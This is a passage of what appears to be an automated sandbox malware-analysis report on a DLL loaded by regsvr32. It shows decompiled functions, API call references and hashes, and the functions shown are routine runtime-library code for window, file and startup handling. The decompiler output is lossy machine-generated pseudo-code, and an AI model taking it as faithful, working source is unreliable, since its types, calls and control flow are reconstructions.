				_push(_t131);
				_push(0x1002d9d0);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t136 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x1002d928,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t136 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x1002fb48, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x1002fb38, _t136 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t135 = _t136 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x1002fd38, _t135);
					if( *_t135 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t137 = E1000E51C(_t136);
						if(_v24 != _t107) {
							E10022A95(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E10022AD3(_v12, _t107);
						}
						_t66 = _t137;
					} else {
						if(_v24 != _t107) {
							E10022A95(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E10022AD3(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}

0x1000e95c
0x1000e964
0x1000e972
0x1000e977
0x1000e97a
0x1000e982
0x1000e984
0x1000e987
0x1000e98a
0x1000e98b
0x1000e9a0
0x1000e9ad
0x1000e9ba
0x1000e9ca
0x1000e9d0
0x1000e9d9
0x1000e9d9
0x1000e9e1
0x1000e9e6
0x1000e9e9
0x1000e9ea
0x1000e9ef
0x1000e9f4
0x1000ea55
0x1000ea64
0x1000ea68
0x1000ea6e
0x1000ea78
0x1000ea7b
0x1000ea81
0x1000ea84
0x1000ea89
0x1000ea94
0x1000eaa0
0x1000eaa3
0x1000eaa9
0x1000eaac
0x1000eab1
0x1000eab3
0x1000eac1
0x00000000
0x1000eac1
0x1000ea8b
0x1000ea8b
0x1000ea8b
0x1000ea89
0x1000e9f6
0x1000e9f6
0x1000e9fa
0x1000ea0a
0x1000ea0d
0x1000ea0f
0x1000ea0f
0x1000ea19
0x1000eac3
0x1000eacd
0x1000eacf
0x1000eae9
0x1000eaf2
0x1000eaf2
0x1000eaf7
0x1000ea1f
0x1000ea22
0x1000ea3c
0x1000ea45
0x1000ea45
0x1000ea4a
0x1000ea4a
0x1000ea19
0x1000eafd

APIs

IsWindowVisible.USER32 ref: 1000E97A
GetDesktopWindow.USER32 ref: 1000E98D
GetWindowRect.USER32 ref: 1000E9A0
GetWindowRect.USER32 ref: 1000E9AD

Part of subcall function 10022A95: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000EAEE,?,?), ref: 10022AB0

Part of subcall function 10022AD3: ShowWindow.USER32(?,?,1000EAF7,00000000,?,?), ref: 10022AE0

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$DesktopMoveShowVisible
String ID:
API String ID: 3835705305-0
Opcode ID: e53b169528299ece0fbc0adda44c65623bd7c21512ed9c642497379546d15cdd
Instruction ID: 6cb93d47231a08dfca33c87ea75e007ddcb68ff5e0e10312099a50c478d50c27
Opcode Fuzzy Hash: e53b169528299ece0fbc0adda44c65623bd7c21512ed9c642497379546d15cdd
Instruction Fuzzy Hash: 7D51F575A0024AAFDB00DFE8D984DAEB7B9FF88344B244469F601EB255DB31BD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001A142 Relevance: 6.1, APIs: 4, Instructions: 145
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001A142(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x100371f4; // 0x39cf7dc9
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x1003a6c0 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E1001B580(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E1001336E())) = 0x1c;
								_t81 = E10013377();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E10013380( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E1001336E())) = 9;
									_t81 = E10013377();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E10011A49(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}

0x1001a143
0x1001a150
0x1001a156
0x1001a15e
0x1001a164
0x1001a167
0x1001a16a
0x1001a18a
0x1001a193
0x1001a196
0x1001a19b
0x1001a1a7
0x1001a1ac
0x1001a1b1
0x1001a1b3
0x1001a1b7
0x1001a29d
0x1001a2a3
0x1001a2a5
0x1001a2b8
0x1001a2a7
0x1001a2aa
0x1001a2ad
0x1001a2ad
0x1001a1bd
0x1001a1bd
0x1001a1c9
0x1001a1cc
0x1001a1cf
0x1001a2c8
0x1001a2c8
0x1001a2ca
0x1001a2cf
0x1001a2e0
0x1001a2e5
0x1001a2eb
0x1001a2f0
0x1001a2f2
0x1001a2f2
0x1001a2fa
0x00000000
0x1001a2fb
0x1001a2d7
0x1001a2da
0x00000000
0x00000000
0x1001a2dc
0x00000000
0x00000000
0x00000000
0x00000000
0x1001a1d5
0x1001a1d5
0x1001a1d8
0x1001a1d8
0x1001a1de
0x1001a1e1
0x1001a1e4
0x1001a1e4
0x1001a1ea
0x00000000
0x00000000
0x1001a1ef
0x1001a1f2
0x1001a1f4
0x1001a1f5
0x1001a1f8
0x1001a1fa
0x1001a1fd
0x1001a200
0x1001a201
0x1001a201
0x1001a201
0x1001a201
0x1001a204
0x1001a206
0x1001a207
0x1001a20a
0x1001a20a
0x1001a218
0x1001a22a
0x1001a230
0x1001a232
0x1001a259
0x1001a25c
0x1001a25c
0x1001a25c
0x1001a25e
0x1001a25e
0x1001a261
0x1001a263
0x1001a2f7
0x1001a2f7
0x00000000
0x1001a2f7
0x1001a269
0x1001a26c
0x00000000
0x00000000
0x1001a270
0x1001a271
0x1001a274
0x1001a2c0
0x1001a276
0x1001a27b
0x1001a281
0x1001a286
0x1001a286
0x00000000
0x1001a274
0x1001a234
0x1001a237
0x1001a23a
0x1001a23c
0x00000000
0x00000000
0x1001a247
0x1001a249
0x1001a249
0x1001a251
0x00000000
0x1001a16c
0x1001a16c
0x1001a2fc
0x1001a30f
0x1001a30f

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,10037780,00000001), ref: 1001A22A

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1bc4981f5cdbf42746497e340523dd52149d5080cc4ecba6cabab4f8cc186ea5
Instruction ID: 62bfa9db21814b1307c6d0c5a82aa6b64fc1d60686e85dc8a58053d1baf4ffac
Opcode Fuzzy Hash: 1bc4981f5cdbf42746497e340523dd52149d5080cc4ecba6cabab4f8cc186ea5
Instruction Fuzzy Hash: 57512471900298DFDB22CFA8C880ADDBBF8FF46354F214119E8599F266DB319A81CF11

Uniqueness

Uniqueness Score: -1.00%

Function 10023F12 Relevance: 6.1, APIs: 4, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10023F12(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x100371f4; // 0x39cf7dc9
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E10023D85(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E10023E04(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E10012ED9(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E10012090(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E10012090(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E10011A49(_t74, _v8);
			}

0x10023f18
0x10023f23
0x10023f26
0x10023f29
0x10023f3c
0x10023f4a
0x10023f52
0x10023f67
0x10023f69
0x10023f6c
0x10023f74
0x10023f6e
0x10023f6e
0x10023f6e
0x10023f83
0x10023fa3
0x10023fa6
0x10023fac
0x10023fb1
0x10023fb3
0x10023fbf
0x10023fbf
0x10023fc3
0x10023fc6
0x10023fca
0x10023fce
0x10023fd1
0x10023fd8
0x10023fdb
0x10023fe3
0x10023fdd
0x10023fdd
0x10023fdd
0x10023fea
0x10023ffc
0x10024001
0x10024001
0x1002400b
0x1002401b
0x10024020
0x1002402b
0x1002402e
0x10024034
0x1002403a
0x10023f85
0x10023f85
0x10023f85
0x10023f2b
0x10023f2b
0x10023f2b
0x10024047

APIs

GlobalLock.KERNEL32 ref: 10023F36
lstrlenA.KERNEL32(?), ref: 10023F7A

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalLocklstrlen
String ID:
API String ID: 1144527523-0
Opcode ID: 6d27e22fb689a02b6ab81224eeade330f7838502c15867fce9e2cf887c2292dc
Instruction ID: d6e0db555126f9e18a7e3546907a938c313cf4e51e5ace9a59664a29dd2540ae
Opcode Fuzzy Hash: 6d27e22fb689a02b6ab81224eeade330f7838502c15867fce9e2cf887c2292dc
Instruction Fuzzy Hash: F341C372D00219EFCB14DFB4D98599EBBB9FF04354B60C22AE816DB151DB30E999CB80

Uniqueness

Uniqueness Score: -1.00%

Function 10011729 Relevance: 6.1, APIs: 4, Instructions: 113
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E10011729(void* __ecx, long* _a8) {
				void* _v8;
				void* __esi;
				void* __ebp;
				long* _t9;
				long* _t11;
				long* _t14;
				long _t17;
				signed int _t25;
				long* _t33;
				long* _t36;
				long* _t38;
				long* _t39;
				void* _t40;
				long _t47;
				long _t50;
				void* _t51;
				void* _t52;
				long* _t53;
				struct _OSVERSIONINFOA* _t54;
				signed int _t56;
				struct _OSVERSIONINFOA* _t58;

				_t9 = _a8;
				if(_t9 != 1) {
					__eflags = _t9;
					if(_t9 != 0) {
						__eflags = _t9 - 2;
						if(__eflags != 0) {
							__eflags = _t9 - 3;
							if(_t9 == 3) {
								E100144AB(0);
							}
							L27:
							_t11 = 1;
							__eflags = 1;
							L28:
							return _t11;
						}
						_push(0x8c);
						_push(1);
						_t53 = E10013955(_t40, _t51, _t52, __eflags);
						__eflags = _t53;
						if(_t53 == 0) {
							L24:
							_t11 = 0;
							goto L28;
						}
						_t14 =  *0x1003a1d0( *0x10037494, _t53);
						__eflags = _t14;
						_push(_t53);
						if(_t14 == 0) {
							E1001111B();
							goto L24;
						}
						E100142E0();
						_t17 = GetCurrentThreadId();
						_t53[1] = _t53[1] | 0xffffffff;
						 *_t53 = _t17;
						goto L27;
					}
					__eflags =  *0x1003a15c - _t9; // 0x0
					if(__eflags <= 0) {
						goto L24;
					}
					 *0x1003a15c =  *0x1003a15c - 1;
					__eflags =  *0x1003a1b0 - _t9; // 0x1
					if(__eflags == 0) {
						E10011C43();
					}
					E10016932();
					E100142C3();
					E10014B0C();
					goto L27;
				}
				E100116D0(0x94, __ecx);
				_t54 = _t58;
				_t54->dwOSVersionInfoSize = 0x94;
				if(GetVersionExA(_t54) == 0) {
					goto L24;
				}
				_t47 = _t54->dwPlatformId;
				 *0x1003a174 = _t47;
				_t25 = _t54->dwMajorVersion;
				 *0x1003a180 = _t25;
				_t50 = _t54->dwMinorVersion;
				 *0x1003a184 = _t50;
				_t56 = _t54->dwBuildNumber & 0x00007fff;
				 *0x1003a178 = _t56;
				if(_t47 != 2) {
					 *0x1003a178 = _t56 | 0x00008000;
				}
				 *0x1003a17c = (_t25 << 8) + _t50;
				if(E10014ABB(1) != 0) {
					if(E100144DA() != 0) {
						E10016D75(__eflags);
						 *0x1003ba50 = GetCommandLineA();
						 *0x1003a160 = E10016C53();
						_t33 = E10016734();
						__eflags = _t33;
						if(_t33 < 0) {
							L13:
							E100142C3();
							goto L6;
						}
						_t36 = E10016BB1();
						__eflags = _t36;
						if(_t36 < 0) {
							L12:
							E10016932();
							goto L13;
						}
						_t38 = E1001697E();
						__eflags = _t38;
						if(_t38 < 0) {
							goto L12;
						}
						_t39 = E10011B05(0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L12;
						}
						 *0x1003a15c =  *0x1003a15c + 1;
						goto L27;
					}
					L6:
					E10014B0C();
				}
			}

0x1001172c
0x10011733
0x10011819
0x1001181b
0x10011849
0x1001184c
0x10011892
0x10011895
0x10011899
0x1001189e
0x1001189f
0x100118a1
0x100118a1
0x100118a2
0x100118a7
0x100118a7
0x1001184e
0x10011853
0x1001185a
0x1001185c
0x10011860
0x1001188e
0x1001188e
0x00000000
0x1001188e
0x10011869
0x1001186f
0x10011871
0x10011872
0x10011888
0x00000000
0x1001188d
0x10011874
0x1001187a
0x10011880
0x10011884
0x00000000
0x10011884
0x1001181d
0x10011823
0x00000000
0x00000000
0x10011825
0x1001182b
0x10011831
0x10011833
0x10011833
0x10011838
0x1001183d
0x10011842
0x00000000
0x10011842
0x1001173e
0x10011743
0x10011746
0x10011754
0x00000000
0x00000000
0x1001175a
0x1001175d
0x10011763
0x10011766
0x1001176b
0x1001176e
0x10011777
0x10011780
0x10011786
0x1001178e
0x1001178e
0x1001179b
0x100117a8
0x100117b5
0x100117c1
0x100117cc
0x100117d6
0x100117db
0x100117e0
0x100117e2
0x10011812
0x10011812
0x00000000
0x10011812
0x100117e4
0x100117e9
0x100117eb
0x1001180d
0x1001180d
0x00000000
0x1001180d
0x100117ed
0x100117f2
0x100117f4
0x00000000
0x00000000
0x100117f8
0x100117fd
0x10011800
0x00000000
0x00000000
0x10011802
0x00000000
0x10011802
0x100117b7
0x100117b7
0x100117b7

APIs

GetVersionExA.KERNEL32(?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 1001174C
GetCommandLineA.KERNEL32(?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 100117C6

Part of subcall function 10016C53: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016C6F
Part of subcall function 10016C53: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016CA5
Part of subcall function 10016C53: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,100117D6), ref: 10016CD9
Part of subcall function 10016C53: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,100117D6,?,?), ref: 10016CFB
Part of subcall function 10016C53: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016D14

Part of subcall function 10013955: __lock.LIBCMT ref: 10013999
Part of subcall function 10013955: RtlAllocateHeap.NTDLL(00000008,?,1002E908,00000010,1001431B,00000001,0000008C,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000), ref: 100139D7

FlsSetValue.KERNEL32(00000000,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10011869
GetCurrentThreadId.KERNEL32 ref: 1001187A

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
String ID:
API String ID: 770256606-0
Opcode ID: f66bb59ed05a3764a3b6657b8b9666b6193ba35cdd237db02441929a540a1d75
Instruction ID: c47be153584374b7353cf999a54b0a280028856245a957f2bce7d5ed9b2b22c2
Opcode Fuzzy Hash: f66bb59ed05a3764a3b6657b8b9666b6193ba35cdd237db02441929a540a1d75
Instruction Fuzzy Hash: EC318F39D046629FE32DDFB08C4269E77E4EF06351F218529E855CE2A2DF30E8C08652

Uniqueness

Uniqueness Score: -1.00%

Function 100245EB Relevance: 6.1, APIs: 4, Instructions: 103
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100245EB(void* __ecx, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* _t43;
				long _t48;
				signed int* _t51;
				signed int* _t54;
				signed int* _t57;
				struct _FILETIME* _t67;
				void* _t81;
				CHAR* _t82;
				signed int* _t83;
				void* _t86;

				_t83 = _a4;
				_t81 = __ecx;
				E10012400(_t83, 0, 0x128);
				lstrcpynA( &(_t83[8]),  *(_t81 + 0xc), 0x104);
				_t43 =  *(_t81 + 4);
				_t86 = _t43 -  *0x1002d628; // 0xffffffff
				if(_t86 == 0) {
					L12:
					return 1;
				}
				_t67 =  &_v12;
				if(GetFileTime(_t43, _t67,  &_v20,  &_v28) == 0) {
					L4:
					return 0;
				}
				_t48 = GetFileSize( *(_t81 + 4), 0);
				_t83[6] = _t48;
				_t83[7] = 0;
				if(_t48 != 0xffffffff || 0 != 0) {
					_t82 =  *(_t81 + 0xc);
					if( *((intOrPtr*)(_t82 - 0xc)) != 0) {
						_t83[8] = (_t67 & 0xffffff00 | GetFileAttributesA(_t82) == 0xffffffff) - 0x00000001 & _t49;
					} else {
						_t83[8] = 0;
					}
					_t51 = E10010922( &_v36,  &_v12, 0xffffffff);
					 *_t83 =  *_t51;
					_t83[1] = _t51[1];
					_t54 = E10010922( &_v36,  &_v20, 0xffffffff);
					_t83[4] =  *_t54;
					_t83[5] = _t54[1];
					_t57 = E10010922( &_v36,  &_v28, 0xffffffff);
					_t83[2] =  *_t57;
					_t83[3] = _t57[1];
					if(( *_t83 | _t83[1]) == 0) {
						 *_t83 =  *_t57;
						_t83[1] = _t57[1];
					}
					if((_t83[4] | _t83[5]) == 0) {
						_t83[4] = _t83[2];
						_t83[5] = _t83[3];
					}
					goto L12;
				} else {
					goto L4;
				}
			}

0x100245f3
0x10024600
0x10024602
0x10024616
0x1002461c
0x1002461f
0x10024625
0x100246f2
0x00000000
0x100246f4
0x10024633
0x10024640
0x1002465b
0x00000000
0x1002465b
0x10024646
0x1002464f
0x10024652
0x10024655
0x10024662
0x10024668
0x10024680
0x1002466a
0x1002466a
0x1002466a
0x1002468c
0x10024693
0x10024698
0x100246a4
0x100246ab
0x100246b1
0x100246bd
0x100246c4
0x100246ca
0x100246d2
0x100246d6
0x100246db
0x100246db
0x100246e4
0x100246e9
0x100246ef
0x100246ef
0x00000000
0x00000000
0x00000000
0x00000000

APIs

lstrcpynA.KERNEL32(?,?,00000104), ref: 10024616
GetFileTime.KERNEL32(?,?,?,?), ref: 10024638
GetFileSize.KERNEL32(?,00000000), ref: 10024646
GetFileAttributesA.KERNEL32(?), ref: 10024670

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: a91baa48bf4037b4f45bc0b7e9cdde213090107d6af27a7cdbb34c679ba3c83b
Instruction ID: 7d7a2e8bbb17eb29deeb0aed23558d3c2c2ea8bfdd4d9c760b90b36e29905935
Opcode Fuzzy Hash: a91baa48bf4037b4f45bc0b7e9cdde213090107d6af27a7cdbb34c679ba3c83b
Instruction Fuzzy Hash: 2D417CB5500A05AFD724DF64D894CAABBF8FF093207518A2DE1A6976A0EB30F945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10022F70 Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10022F70(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001D91C( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10007404( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10007404( &_a4)));
								_v8 =  *((intOrPtr*)(E10007404( &_a4)));
								if((E10022BC1(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E1000898C( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E1000898C( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E10022BC1(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
